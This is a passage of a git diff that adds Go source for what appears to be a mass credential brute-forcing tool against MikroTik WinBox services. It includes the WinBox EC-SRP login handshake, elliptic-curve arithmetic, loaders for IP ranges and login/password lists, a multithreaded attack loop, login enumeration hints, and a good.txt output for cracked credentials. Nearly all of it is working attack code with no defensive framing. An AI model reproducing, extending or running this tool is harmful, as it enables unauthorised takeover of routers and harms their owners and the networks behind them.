z1.Add(z2).Mul(z1.Add(z2)).Sub(z1z1).Sub(z2z2).Mul(h).Mod(p) + + return x3, y3, z3 +} + +func (self *JacobiPoint) AddPoint(other *Point) *JacobiPoint { + return self.Add(other.FromAffine()) +} + +func (self *JacobiPoint) Add(other *JacobiPoint) *JacobiPoint { + if other.IsInf() { + return self + } + + if self.IsInf() { + return other + } + + if !self.curve.Eq(other.curve) { + panic("cannot add with different curves") + } + + x3, y3, z3 := self._Add(self.x, self.y, self.z, other.x, other.y, other.z, self.curve.p) + if y3.Empty() || z3.Empty() { + return NewInfJacobiPoint() + } + + return NewJacobiPoint(self.curve, x3, y3, z3, self.order) +} + +func (self *JacobiPoint) Mul(other bigint) *JacobiPoint { + if self.y.Empty() || other.Empty() { + return NewInfJacobiPoint() + } + if other.EqInt(1) { + return self + } + if !self.order.Empty() { + other = other.Mod(self.order.MulInt(2)) + } + + self = self.Scale() + x2, y2 := self.x, self.y + x3, y3, z3 := NewBigint(0), NewBigint(0), NewBigint(1) + p, a := self.curve.p, self.curve.a + + nf := naf(other) + + for i := len(nf) - 1; i >= 0; i-- { + x3, y3, z3 = self._Double(x3, y3, z3, p, a) + if nf[i].LtInt(0) { + x3, y3, z3 = self._Add(x3, y3, z3, x2, y2.Neg(), NewBigint(1), p) + } else if nf[i].GtInt(0) { + x3, y3, z3 = self._Add(x3, y3, z3, x2, y2, NewBigint(1), p) + } + } + + if y3.Empty() || z3.Empty() { + return NewInfJacobiPoint() + } + + return NewJacobiPoint(self.curve, x3, y3, z3, self.order) +} + +func (self *JacobiPoint) MulAdd(selfMul bigint, other *JacobiPoint, otherMul bigint) *JacobiPoint { + return self.Mul(selfMul).Add(other.Mul(otherMul)) +} diff --git a/results.go b/results.go new file mode 100644 index 0000000..4dc4bf0 --- /dev/null +++ b/results.go @@ -0,0 +1,46 @@ +package main + +import ( + "fmt" + "os" +) + +var outFile *os.File + +func RegisterResult(t *Task, good bool) { + if good { + log("res", 0, "****************\n******** OK: %v %v %v\n****************", t.e.String(), t.login, t.password) + if outFile != nil { + fmt.Fprintf(outFile, "%v\t%v\t%v\n", t.e.String(), t.login, t.password) + } + } else { + log("res", 1, "bad: %v %v %v", t.e.String(), t.login, t.password) + } +} + +func OpenOutFile() { + fileName := CfgGetString("out-file") + if fileName == "" { + log("out", 0, "WARNING: out-file is not specified, results will only be logged in console") + outFile = nil + } else { + var err error + outFile, err = os.OpenFile(fileName, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + + if err != nil { + fail("error opening output file \"%v\": %v", fileName, err.Error()) + } + + log("out", 2, "opened output file \"%v\"", fileName) + } +} + +func CloseOutFile() { + outFile.Close() + outFile = nil +} + +func init() { + CfgRegister("out-file", "good.txt", "results will be saved in this file") + CfgRegisterAlias("o", "out-file") +} diff --git a/service.go b/service.go new file mode 100644 index 0000000..c52a0ce --- /dev/null +++ b/service.go @@ -0,0 +1,29 @@ +package main + +import ( + "errors" + "net" +) + +// TODO: multiple services... + +func TryLogin(task *Task, conn net.Conn) (res bool, err error) { + defer func() { + if r := recover(); r != nil { + log("srv", 1, "fatal error (panic) in service handler: %v", r) + res = false + + switch x := r.(type) { + case string: + err = errors.New(x) + case error: + err = x + default: + err = errors.New("unknown error") + } + } + }() + + res, err = NewWinbox(task, conn).TryLogin() + return res, err +} diff --git a/source.go b/source.go new file mode 100644 index 0000000..9adec5d --- /dev/null +++ b/source.go @@ -0,0 +1,288 @@ +package main + +import ( + "bufio" + "os" + "strconv" + "strings" + "sync" +) + +type Source struct { + name, plainParmName, filesParmName string + + validator func(item string) (string, error) + + plain []string + files []*os.File + fileNames []string + + contents []string + + fetchMutex sync.Mutex +} + +// both -1: exhausted +// both 0: not started yet +type SourcePos struct { + plainIdx int + contentIdx int +} + +func (pos *SourcePos) String() string { + return "P" + strconv.Itoa(pos.plainIdx) + "/C" + strconv.Itoa(pos.contentIdx) +} + +func (pos *SourcePos) Exhausted() bool { + return pos.plainIdx == -1 && pos.contentIdx == -1 +} + +func ipValidator(item string) (res string, err error) { + return item, nil +} + +func passwordValidator(item string) (res string, err error) { + if CfgGetSwitch("no-password-trim") { + return item, nil + } else { + return strings.TrimSpace(item), nil + } +} + +var SrcIP Source = Source{name: "ip", plainParmName: "ip", filesParmName: "ip-file"} +var SrcLogin Source = Source{name: "login", plainParmName: "login", filesParmName: "login-file"} +var SrcPassword Source = Source{name: "password", plainParmName: "password", + filesParmName: "password-file", validator: passwordValidator} + +func (src *Source) validate(item string) (res string, err error) { + if src.validator != nil { + res, err := src.validator(item) + if err != nil { + log("src", 1, "error validating %v \"%v\": %v", src.name, item, err.Error()) + } + return res, err + } else { + return item, nil + } +} + +func (src *Source) parsePlain() { + if src.plain == nil { + src.plain = []string{} + } + + for _, plain := range CfgGetStringSlice(src.plainParmName) { + var err error + plain, err = src.validate(plain) + if err != nil { + continue + } + + src.plain = append(src.plain, plain) + } + + if len(src.plain) > 0 { + log("src", 1, "parsed %v %v items", len(src.plain), src.name) + } +} + +func (src *Source) openFiles() { + if src.files == nil { + src.files = []*os.File{} + } + + if src.fileNames == nil { + src.fileNames = []string{} + } + + fileNames := CfgGetStringSlice(src.filesParmName) + for _, fileName := range fileNames { + f, err := os.Open(fileName) + if err != nil { + fail("error opening source file \"%v\": %v", fileName, err.Error()) + } + + src.files = append(src.files, f) + src.fileNames = append(src.fileNames, fileName) + } + + if len(src.files) > 0 { + log("src", 1, "opened %v %v files", len(src.files), src.name) + } +} + +// this parses all source files +func (src *Source) parseFiles() { + if src.contents == nil { + src.contents = []string{} + } + + for i, file := range src.files { + fileName := src.fileNames[i] + log("src", 1, "parsing %v", fileName) + thisTotal := 0 + + scanner := bufio.NewScanner(file) + for scanner.Scan() { + text := scanner.Text() + if text == "" { + continue + } + + value, err := src.validate(text) + if err != nil { + continue + } + + src.contents = append(src.contents, value) + thisTotal++ + } + + scannerErr := scanner.Err() + failIf(scannerErr != nil, "error reading source file \"%v\": %v", fileName, scannerErr) + log("src", 1, "ok: parsed %v, got %v contents, %v total", fileName, thisTotal, len(src.contents)) + } +} + +func (src *Source) failIfEmpty() { + failIf(len(src.contents)+len(src.plain) == 0, "no %vs defined: check %v and %v parameters", src.name, src.plainParmName, src.filesParmName) +} + +func (src *Source) reportLoaded() { + log("src", 0, "loaded %vs: %v items from commandline and %v items from files", src.name, len(src.plain), len(src.contents)) +} + +func (src *Source) load(wg *sync.WaitGroup) { + if wg != nil { + defer wg.Done() + } + + if src.name == "password" && CfgGetSwitch("add-empty-password") { + if src.plain == nil { + src.plain = []string{} + } + src.plain = append(src.plain, "") + } + + src.parsePlain() + src.openFiles() + defer src.closeFiles() + + src.parseFiles() + src.failIfEmpty() +} + +func (src *Source) closeFiles() { + l := len(src.files) + for _, file := range src.files { + if file != nil { + file.Close() + } + } + + src.files = []*os.File{} + src.fileNames = []string{} + log("src", 1, "closed all %v %v files", l, src.name) +} + +func (src *Source) fetchFromSlice(name string, idx *int, slice []string, inc bool) (res string, empty bool) { + if *idx == -1 { + // exhausted + log("src", 3, "fetch %v from %v: idx is -1, return empty", src.name, name) + return "", true + } + + if *idx >= len(slice) { + log("src", 3, "fetch %v from %v: idx >= slice length (%v >= %v), marking as exhausted, return empty", src.name, name, *idx, len(slice)) + *idx = -1 + return "", true + } + + res = slice[*idx] + log("src", 3, "fetch %v from %v: ok, got %v at idx %v", src.name, name, res, *idx) + + if inc { + *idx = *idx + 1 + log("src", 3, "fetch %v from %v: incrementing idx to %v", src.name, name, *idx) + } + + return res, false +} + +// retrieves an item from source +// increments pos +func (src *Source) FetchOne(pos *SourcePos, inc bool) (res string, empty bool) { + src.fetchMutex.Lock() + defer src.fetchMutex.Unlock() + + if CfgGetSwitch("file-contents-first") { + res, empty = src.fetchFromSlice("contents", &pos.contentIdx, src.contents, inc) + if empty { + res, empty = src.fetchFromSlice("plain", &pos.plainIdx, src.plain, inc) + } + } else { + res, empty = src.fetchFromSlice("plain", &pos.plainIdx, src.plain, inc) + if empty { + res, empty = src.fetchFromSlice("contents", &pos.contentIdx, src.contents, inc) + } + } + + logIf(empty, "src", 2, "exhausted source %v for pos %v", src.name, pos.String()) + return res, empty +} + +func (pos *SourcePos) Reset() { + pos.plainIdx = 0 + pos.contentIdx = 0 + log("src", 3, "resetting source pos") +} + +func LoadSources() { + log("src", 1, "loading sources") + + var wg sync.WaitGroup + wg.Add(3) + go SrcIP.load(&wg) + go SrcLogin.load(&wg) + go SrcPassword.load(&wg) + wg.Wait() + + SrcIP.reportLoaded() + SrcLogin.reportLoaded() + SrcPassword.reportLoaded() + + ParseEndpoints(SrcIP.plain) + + // TODO: dynamic loading of contents + // currently this just dumps everything to a slice + ParseEndpoints(SrcIP.contents) + + log("src", 1, "ok: finished loading sources") +} + +func CloseSources() { + log("src", 1, "closing sources") + SrcIP.closeFiles() + SrcLogin.closeFiles() + SrcPassword.closeFiles() + log("src", 1, "ok: finished closing sources") +} + +func init() { + CfgRegister("ip", []string{}, "IPs or subnets in CIDR notation") + CfgRegister("ip-file", []string{}, "paths to files with IPs or subnets in CIDR notation (one entry per line)") + CfgRegister("login", []string{}, "one or more logins") + CfgRegister("login-file", []string{}, "paths to files with logins (one entry per line)") + CfgRegister("password", []string{}, "one or more passwords") + CfgRegister("password-file", []string{}, "paths to files with passwords (one entry per line)") + + CfgRegisterSwitch("add-empty-password", "insert an empty password to the password list") + //CfgRegisterSwitch("no-source-validation", "do not attempt to validate and count lines in source files") + CfgRegisterSwitch("no-password-trim", "preserve leading and trailing spaces in passwords") + CfgRegisterSwitch("logins-first", "increment logins before passwords") + CfgRegisterSwitch("file-contents-first", "try to go through source files first, defer commandline args for later") + + // + //CfgRegisterSwitch("ignore-network-names", "always skip non-IPv4/non-IPv6 entries, do not attempt to resolve them as domain names") + // +} diff --git a/task.go b/task.go new file mode 100644 index 0000000..747f298 --- /dev/null +++ b/task.go @@ -0,0 +1,285 @@ +package main + +import ( + rbt "github.com/emirpasic/gods/trees/redblacktree" + rbtUtils "github.com/emirpasic/gods/utils" + "net" + "sync" + "time" +) + +// TaskEvent represents all events that can be issued on a Task. +type TaskEvent int + +const ( + TE_Generic TaskEvent = iota // undefined or no event + + // These should terminate a task instantly. + TE_NoResponse // connect timed out + TE_ReadFailed // read failed or timed out + TE_NoService // endpoint does not provide selected service + TE_ProtocolError // a service module reported an error during auth attempt + TE_Bad // auth attempt completed successfully but credentials were wrong + TE_Good // auth attempt completed successfully and the credentials are correct + + // TODO: proxying + TE_ProxyNoResponse // cannot connect to a proxy + TE_ProxyError // proxy failed during an exchange with the endpoint + TE_ProxyInvalidAuth // authenticated proxy rejected our credentials + + // These serve as "hints" - they do not necessarily need to + // terminate a task, but they can still provide useful + // information about an endpoint or a service. + TH_NoSuchLogin // login in this task is not present or not valid on a service + TH_LoadExceeded // endpoint or service cannot handle this attempt rate + TH_Banned // got banned from a service, should try another proxy or wait out the delay + TH_WaitRequest // request for a grace time + + // These are still hints, but they occur very frequently on a Task's normal lifecycle, + // effectively making these sort of "notifications" rather than hints. + TN_Connected // successfully connected to an endpoint + TN_ProxyConnected // successfully connected to a proxy +) + +func (ev TaskEvent) String() string { + return [...]string{"Generic", "No response", "Read failed", "No Service", "Protocol error", + "Bad", "Good", "No response from Proxy", "Error from Proxy", "Invalid auth from Proxy", + "No Such login (hint)", "Load exceeded (hint)", "Banned (hint)", "Wait request (hint)", + "Connected (notify)", "Connected from Proxy (notify)"}[ev] +} + +// A Task represents a single unit of workload. +// Every Task is linked to an Endpoint. +type Task struct { + e *Endpoint + login, password string + deferUntil time.Time + numDeferrals int + + // this should not be in Task struct! + conn net.Conn + // ??? do we even need this here + good bool +} + +// maxSafeThreads is a safeguard to prevent creation of too many threads at once. +const maxSafeThreads = 5000 + +// deferredTasks is a list of tasks that were deferred for processing to a later time. +// This usually happens due to connection errors, protocol errors or per-endpoint limits. +var deferredTasks *rbt.Tree + +// taskMutex is a mutex for safe handling of RB tree. +var taskMutex sync.Mutex + +// String returns a string representation of a Task. +func (task *Task) String() string { + if task == nil { + return "" + } else { + return task.e.String() + "@" + task.login + ":" + task.password + } +} + +// Defer sends a Task to the deferred queue. +func (task *Task) Defer(addTime time.Duration) { + task.deferUntil = time.Now().Add(addTime) + task.numDeferrals++ + + // tell the endpoint that we got deferred, + // so it won't be selected until the deferral time has passed + // task.e.SetDeferralTime(task.deferUntil) + // FIXME: this isn't needed, endpoints can handle their own delays + + maxDeferrals := CfgGetInt("task-max-deferrals") + if maxDeferrals != -1 && task.numDeferrals >= maxDeferrals { + log("task", 5, "giving up on task \"%v\" because it has exhausted its deferral limit (%v)", task, maxDeferrals) + return + } + + log("task", 5, "deferring task \"%v\" for %v", task, addTime) + + taskMutex.Lock() + defer taskMutex.Unlock() + + deferredTasks.Put(task.deferUntil, task) +} + +// EventWithParm tells a Task (and its underlying Endpoint) that +// something important has happened, or a hint has been acquired. +// Returns False if an event resulted in a deletion of its Task. +func (task *Task) EventWithParm(event TaskEvent, parm any) bool { + log("task", 4, "task event for \"%v\": %v", task, event) + + if event == TE_Generic { + return true // do not process generic events + } + + res := task.e.EventWithParm(event, parm) // notify the endpoint first + + switch event { + // on these events, defer a Task only if its Endpoint is being kept + case TE_NoResponse: + if res { + task.Defer(CfgGetDurationMS("no-response-delay-ms")) + } + case TE_ReadFailed: + if res { + task.Defer(CfgGetDurationMS("read-error-delay-ms")) + } + case TE_ProtocolError: + if res { + task.Defer(CfgGetDurationMS("protocol-error-delay-ms")) + } + + // report about a bad/good auth result + case TE_Good: + RegisterResult(task, true) + case TE_Bad: + RegisterResult(task, false) + + // wait request has occurred: stop processing and instantly wait on a thread + case TH_WaitRequest: + log("task", 4, "wait request for \"%v\": sleeping for %v", task, parm.(time.Duration)) + time.Sleep(parm.(time.Duration)) + } + + return res +} + +// Event is a parameterless version of EventWithParm. +func (task *Task) Event(event TaskEvent) bool { + return task.EventWithParm(event, 0) +} + +// GetDeferredTask retrieves a Task from the deferred queue. +func GetDeferredTask() (task *Task, waitTime time.Duration) { + currentTime := time.Now() + + if deferredTasks.Empty() { + log("task", 5, "deferred task list is empty") + return nil, 0 + } + + // check if a deferred task's endpoint is OK to fetch - + // sometimes, a task is OK to fetch but the endpoint was delayed by something else + + it := deferredTasks.IteratorAt(deferredTasks.Left()) + for { + k, v := it.Key().(time.Time), it.Value().(*Task) + + if k.After(currentTime) { + log("task", 5, "deferred tasks cannot yet be processed at this time") + return nil, k.Sub(currentTime) + } + + if k.Before(v.deferUntil) { + log("task", 5, "deferred task was re-deferred: removing its previous definition") + defer deferredTasks.Remove(k) + it.Next() + continue + } + + if !v.e.delayUntil.IsZero() && v.e.delayUntil.After(currentTime) { + // skip this task: deferred task is OK, but its endpoint is delayed + it.Next() + continue + } + + defer deferredTasks.Remove(k) + return v, 0 + } + + log("task", 5, "deferred tasks are OK for processing but their endpoints cannot yet be processed at this time") + return nil, 0 +} + +// FetchTaskComponents returns all components needed to build a Task. +func FetchTaskComponents() (ep *Endpoint, login string, password string, waitTime time.Duration) { + var empty bool + + log("task", 5, "fetching new endpoint") + ep, waitTime = FetchEndpoint() + if ep == nil { + return nil, "", "", waitTime + } + + log("task", 5, "fetched endpoint: \"%v\"", ep) + + for { + log("task", 5, "fetching password for \"%v\"", ep) + password, empty = SrcPassword.FetchOne(&ep.passwordPos, true) + if !empty { + break + } + + log("task", 5, "out of passwords for \"%v\": resetting and fetching new login", ep) + ep.passwordPos.Reset() + login, empty = SrcLogin.FetchOne(&ep.loginPos, true) + } + + log("task", 5, "got password for \"%v\": %v, fetching login", ep, password) + login, empty = SrcLogin.FetchOne(&ep.loginPos, false) + + if !empty { + log("task", 5, "got login for \"%v\": %v", ep, login) + return ep, login, password, 0 + } else { + log("task", 5, "out of logins for \"%v\": exhausting endpoint", ep) + ep.Exhausted() + return FetchTaskComponents() // attempt to fetch again + } +} + +// CreateTask creates a new Task element. It searches through deferred queue first, +// then, if nothing was found, it assembles a new (Endpoint, login, password) combination. +func CreateTask() (task *Task, delay time.Duration) { + taskMutex.Lock() + defer taskMutex.Unlock() + + task, delayDeferred := GetDeferredTask() + if task != nil { + log("task", 4, "new task (deferred): %v", task) + task.conn = nil + task.good = false + return task, 0 + } + + ep, login, password, delaySource := FetchTaskComponents() + if ep == nil { + if delayDeferred == 0 && delaySource == 0 { + log("task", 4, "cannot build task, no endpoint") + return nil, 0 + } else if delayDeferred > delaySource || delayDeferred == 0 { + log("task", 4, "delaying task creation (by source delay) for %v", delaySource) + return nil, delaySource + } else { + log("task", 4, "delaying task creation (by deferred delay) for %v", delayDeferred) + return nil, delayDeferred + } + } + + t := Task{} + t.e = ep + t.login = login + t.password = password + t.good = false + + log("task", 4, "new task: %v", &t) + + return &t, 0 +} + +func init() { + deferredTasks = rbt.NewWith(rbtUtils.TimeComparator) + + CfgRegister("threads", 3, "how many threads to use") + CfgRegister("thread-delay-ms", 10, "separate threads at startup for this amount of ms") + CfgRegister("connect-timeout-ms", 3000, "") + CfgRegister("read-timeout-ms", 2000, "") + + // using a very high limit for now, but this should actually be set to -1 + CfgRegister("task-max-deferrals", 30000, "how many deferrals are allowed for a single task. -1 to disable") + + CfgRegisterAlias("t", "threads") +} diff --git a/thread.go b/thread.go new file mode 100644 index 0000000..f113efa --- /dev/null +++ b/thread.go @@ -0,0 +1,112 @@ +package main + +import ( + "net" + "sync" + "time" +) + +// threadWork processes a single work item for a thread. +func threadWork(dialer *net.Dialer) bool { + readTimeout := CfgGetDurationMS("read-timeout-ms") + + task, delay := CreateTask() + if task == nil { + if delay > 0 { + log("thread", 3, "no endpoints available, sleeping for %v", delay) + time.Sleep(delay) + return true + } else { + log("thread", 3, "no endpoints available, stopping thread loop") + return false + } + } + + conn, err := dialer.Dial("tcp", task.e.String()) + if err != nil { + task.Event(TE_NoResponse) + log("thread", 2, "cannot connect to \"%v\": %v", task.e, err.Error()) + return true + } + defer conn.Close() + + task.conn = conn + task.Event(TN_Connected) + + conn.SetReadDeadline(time.Now().Add(readTimeout)) // should be just before Send() call... + + log("thread", 2, "trying %v:%v on \"%v\"", task.login, task.password, task.e) + + // TODO: multiple services (currently just WinBox) + res, err := TryLogin(task, conn) + if err != nil { + task.Event(TE_ProtocolError) + } else { + if res && err == nil { + task.EventWithParm(TE_Good, task.login) + } else { + task.EventWithParm(TE_Bad, task.login) + } + } + + return true +} + +// threadLoop calls threadWork in a loop, until the endpoints are exhausted, +// a pause/stop signal has been raised, or an exception has occurred in threadWork. +func threadLoop(dialer *net.Dialer) { + for threadWork(dialer) { + // TODO: pause/stop signal + // TODO: exception handling + } +} + +// threadEntryPoint is the main entrypoint for a work thread. +func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) { + <-c + + log("thread", 3, "starting loop for thread %v", threadIdx) + + connectTimeout := time.Duration(CfgGetInt("connect-timeout-ms")) * time.Millisecond + dialer := net.Dialer{Timeout: connectTimeout, KeepAlive: -1} + + threadLoop(&dialer) + + log("thread", 3, "exiting thread %v", threadIdx) + wg.Done() +} + +// InitializeThreads creates and starts up all threads. +func InitializeThreads() *sync.WaitGroup { + numThreads := CfgGetInt("threads") + failIf(numThreads > maxSafeThreads, "too many threads (max %v)", maxSafeThreads) + + log("thread", 0, "initializing %v threads", numThreads) + + c := make(chan bool) + var wg sync.WaitGroup + for i := 1; i <= numThreads; i++ { + wg.Add(1) + go threadEntryPoint(c, i, &wg) + } + + threadDelay := CfgGetDurationMS("thread-delay-ms") + log("thread", 0, "starting %v threads", numThreads) + for i := 1; i <= numThreads; i++ { + c <- true + if threadDelay > 0 { + time.Sleep(threadDelay) + } + } + + log("thread", 0, "started") + return &wg +} + +// WaitForThreads enters a wait state and keeps it until +// all threads have exited. +func WaitForThreads(wg *sync.WaitGroup) { + log("thread", 1, "waiting for threads") + wg.Wait() + log("thread", 1, "finished waiting for threads") +} diff --git a/winbox.go b/winbox.go new file mode 100644 index 0000000..dc1d430 --- /dev/null +++ b/winbox.go @@ -0,0 +1,193 @@ +package main + +import ( + "bytes" + "errors" + "net" +) + +type Winbox struct { + task *Task + conn net.Conn + stage int + + user, pass string + w *WCurve + sa, xwa, xwb, j, z, secret, clientCC, serverCC, i, msg, resp []byte + xwaParity, xwbParity bool +} + +func NewWinbox(task *Task, conn net.Conn) *Winbox { + winbox := Winbox{} + winbox.task = task + winbox.conn = conn + winbox.xwaParity = false + winbox.xwbParity = false + winbox.w = NewWCurve() + winbox.stage = -1 + winbox.user = task.login + winbox.pass = task.password + return &winbox +} + +func (winbox *Winbox) genSharedSecret(salt []byte) error { + winbox.i = genPasswordValidatorPriv(winbox.user, winbox.pass, salt) + xGamma, _ := winbox.w.genPublicKey(winbox.i) + v := winbox.w.redp1(xGamma, true) + + wb := winbox.w.liftX(NewBigintFromBytes(winbox.xwb), winbox.xwbParity) + if wb == nil { + winbox.stage = -1 + return errors.New("liftX failed") + } + + wb = wb.Add(v) + + xwaCombined := append(winbox.xwa, winbox.xwb...) + winbox.j = getSHA2Digest(xwaCombined) + pt := NewBigintFromBytes(winbox.i).Mul(NewBigintFromBytes(winbox.j)) + pt = pt.Add(NewBigintFromBytes(winbox.sa)) + pt = winbox.w.finiteFieldValue(pt) + + mp := wb.Mul(pt) + + winbox.z, _ = winbox.w.toMontgomery(mp) + winbox.secret = getSHA2Digest(winbox.z) + + return nil +} + +func (winbox *Winbox) publicKeyExchange() { + winbox.sa, _ = genRandomBytes(32) + winbox.xwa, winbox.xwaParity = winbox.w.genPublicKey(winbox.sa) + + lx := winbox.w.liftX(NewBigintFromBytes(winbox.xwa), winbox.xwaParity) + if lx == nil { + log("winbox", 1, "liftX failed in PKE") + winbox.stage = -1 + return + } + + if !winbox.w.check(lx) { + log("winbox", 1, "curve check failed") + winbox.stage = -1 + return + } + + winbox.msg = append([]byte(winbox.user), byte(0)) + winbox.msg = append(winbox.msg, winbox.xwa...) + if winbox.xwaParity { + winbox.msg = append(winbox.msg, byte(1)) + } else { + winbox.msg = append(winbox.msg, byte(0)) + } + + header := append([]byte{byte(len(winbox.msg))}, byte(6)) + winbox.msg = append(header, winbox.msg...) + winbox.stage = 1 +} + +func (winbox *Winbox) confirmation() error { + if len(winbox.resp) <= 2 { + log("winbox", 1, "response size must be greater than 2 (got %v)", len(winbox.resp)) + winbox.stage = -1 + return errors.New("invalid response size") + } + + respLen := winbox.resp[0] + winbox.resp = winbox.resp[2:] + if len(winbox.resp) != int(respLen) { + log("winbox", 1, "invalid challenge response size: got %v, expected %v", len(winbox.resp), respLen) + winbox.stage = -1 + return errors.New("invalid challenge response size") + } + + winbox.xwb = winbox.resp[:32] + if winbox.resp[32] == 0 { + winbox.xwbParity = false + } else { + winbox.xwbParity = true + } + + salt := winbox.resp[33:] + if len(salt) != 16 { + // this means that there is no such login, + // or that its an old routeros version + log("winbox", 1, "invalid salt size: got %v, expected 16", len(salt)) + + // report this finding to endpoint manager + winbox.task.EventWithParm(TH_NoSuchLogin, winbox.user) + + winbox.stage = -1 + return nil // this is not a fatal error for an endpoint + } + + err := winbox.genSharedSecret(salt) + if err != nil { + return err + } + + winbox.j = getSHA2Digest(append(winbox.xwa, winbox.xwb...)) + winbox.clientCC = getSHA2Digest(append(winbox.j, winbox.z...)) + + header := append([]byte{byte(len(winbox.clientCC))}, byte(6)) + winbox.msg = append(header, winbox.clientCC...) + winbox.stage = 2 + return nil +} + +func (winbox *Winbox) sendAndRecv() error { + if len(winbox.msg) > 0 && winbox.conn != nil { + _, err := winbox.conn.Write(winbox.msg) + winbox.msg = []byte{} + + if err != nil { + log("winbox", 1, "failed to send: %v", err.Error()) + return err + } + + winbox.resp = make([]byte, 1024) + n, err := winbox.conn.Read(winbox.resp) + if err != nil { + log("winbox", 1, "failed to recv: %v", err.Error()) + return err + } + + winbox.resp = winbox.resp[:n] + } + + return nil +} + +func (winbox *Winbox) TryLogin() (result bool, err error) { + log("winbox", 2, "login: stage 1, PKE") + winbox.publicKeyExchange() + + log("winbox", 2, "login: stage 1, PKE OK, sending") + err = winbox.sendAndRecv() + if err != nil { + return false, err + } + + log("winbox", 2, "login: stage 2, confirmation") + err = winbox.confirmation() + if err != nil { + return false, err + } + + if winbox.stage == -1 { // confirmation failed but no error? + return false, nil // report that its a bad login + } + + log("winbox", 2, "login: stage 2, confirmation OK, sending") + err = winbox.sendAndRecv() + if err != nil { + return false, err + } + + log("winbox", 2, "login: stage 3") + a1 := append(winbox.j, winbox.clientCC...) + winbox.serverCC = getSHA2Digest(append(a1, winbox.z...)) + + return bytes.Equal(winbox.resp[2:], winbox.serverCC), nil +}